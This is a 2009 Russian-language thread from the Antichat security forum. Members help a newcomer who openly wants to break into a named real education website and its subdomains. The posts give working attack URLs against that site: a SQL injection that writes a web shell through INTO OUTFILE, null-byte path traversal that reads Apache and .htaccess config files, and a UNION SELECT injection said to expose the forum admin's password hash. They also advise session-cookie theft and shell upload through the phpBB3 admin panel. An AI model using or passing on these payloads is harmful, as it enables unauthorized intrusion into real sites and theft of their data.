ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #7731  
Старый 18.06.2009, 13:31
Скорпиончик
Banned
Регистрация: 16.06.2009
Сообщений: 5
Провел на форуме:
30688

Репутация: -51
По умолчанию

Цитата:
Сообщение от Fuckel  
попробуй INTO OUTFILE и ищи папку с правами на запись
подскадите как составить запрос на запись файла.
 
Ответить с цитированием

  #7732  
Старый 18.06.2009, 13:36
Fuckel
Участник форума
Регистрация: 17.01.2008
Сообщений: 170
Провел на форуме:
1608606

Репутация: 105
Отправить сообщение для Fuckel с помощью ICQ
По умолчанию

например:
http://egechita.ru/news/show_news.php?id_news=-1+UNION+SELECT+1,2,3,4,5+INTO+OUTFILE+'/tmp/shell.php'+--+

мб пригодится
http://egechita.ru/documents/show_doc.php?doc=../../../../../../../../etc/httpd/conf/httpd.conf
 
Ответить с цитированием

  #7733  
Старый 18.06.2009, 13:41
Jokester
Members of Antichat - Level 5
Регистрация: 18.02.2008
Сообщений: 1,136
Провел на форуме:
17621293

Репутация: 4915


По умолчанию

Fuckel

Я вот одного не пойму, зачем советовать то, что не будет работать?
Для записи в файл нужны права, а там их нет у юзера

Скорпиончик Сначала нужно почитать что-то , а потом по прочтению задавать вопросы. Статей куча на форуме
 
Ответить с цитированием

  #7734  
Старый 18.06.2009, 13:48
Fuckel
Участник форума
Регистрация: 17.01.2008
Сообщений: 170
Провел на форуме:
1608606

Репутация: 105
Отправить сообщение для Fuckel с помощью ICQ
По умолчанию

я посоветовал ему попробывать, не утверждал что будет работать
 
Ответить с цитированием

  #7735  
Старый 18.06.2009, 15:05
Pashkela
Динозавр
Регистрация: 10.01.2008
Сообщений: 2,841
Провел на форуме:
9220514

Репутация: 3338


Отправить сообщение для Pashkela с помощью ICQ
По умолчанию

Цитата:
Сообщение от Скорпиончик  
Можно ли залить shell сюда?
http://egechita.ru/documents/show_doc.php?doc=68&type=federalsfhjdgj
2 вопрос
/home/www/egechita/documents/show_doc.php
вот структура сайта.
Что я могу ещё полезного вытащить кроме етк/пасс?
сервер *nix
Можно получить доступ к приватной инфо, кое-что почитать и прочитав нужное сделать таки своё грязное дело

Код:
http://egechita.ru/documents/show_doc.php?doc=68&type=../../../../../home/www/egechita/forum/.htaccess%00
плюс там есть сессии в куках, зарегится везде, где только можно, выкупить путь хранения сессий и посмотреть, что выдаст

там кстати PHPBB3, шелл там льется элементарно, если попасть в админку

ЗЫЖ А можно поискать логи и не париться

Последний раз редактировалось Pashkela; 18.06.2009 в 15:16..
 
Ответить с цитированием

  #7736  
Старый 18.06.2009, 16:28
Скорпиончик
Banned
Регистрация: 16.06.2009
Сообщений: 5
Провел на форуме:
30688

Репутация: -51
По умолчанию

спс, может ктонить знает какиенить эксплоиты для phpbb3. Подскажите плиз.
какиенибудь ссылки. Уж очень хочиться проникнуть в серв.
 
Ответить с цитированием

  #7737  
Старый 18.06.2009, 16:33
Pashkela
Динозавр
Регистрация: 10.01.2008
Сообщений: 2,841
Провел на форуме:
9220514

Репутация: 3338


Отправить сообщение для Pashkela с помощью ICQ
По умолчанию

https://forum.antichat.ru/thread24488.html
 
Ответить с цитированием

  #7738  
Старый 18.06.2009, 18:23
dr.Pilulkin
Познающий
Регистрация: 03.06.2007
Сообщений: 44
Провел на форуме:
418827

Репутация: 48
По умолчанию

2 Скорпиончик

http://egechita.ru/documents/show_doc.php?doc=68&type=../../../../../etc/httpd/conf/httpd.conf%00

Конфиг апача. Видим что есть еще два хоста temp.egechita.ru и online.egechita.ru

смотрим online.egechita.ru и видим

http://online.egechita.ru/?theme=-7+union+select+1,2,3,4,5--

SQL injection

Хеш админа форума доступен
 
Ответить с цитированием

  #7739  
Старый 18.06.2009, 23:44
Велемир
Banned
Регистрация: 19.06.2006
Сообщений: 1,239
Провел на форуме:
1469161

Репутация: 142


Отправить сообщение для Велемир с помощью ICQ
По умолчанию

Какие системные и *несистемные* таблицы есть в PostgreSql ? information_schema там вообще нету
 
Ответить с цитированием

  #7740  
Старый 18.06.2009, 23:50
ElteRUS
Постоянный
Регистрация: 11.10.2007
Сообщений: 406
Провел на форуме:
7215020

Репутация: 1423
По умолчанию

Цитата:
Сообщение от Велемир  
Какие системные и *несистемные* таблицы есть в PostgreSql ? information_schema там вообще нету
http://www.postgresql.org/docs/8.3/static/catalogs.html
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Форумы 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ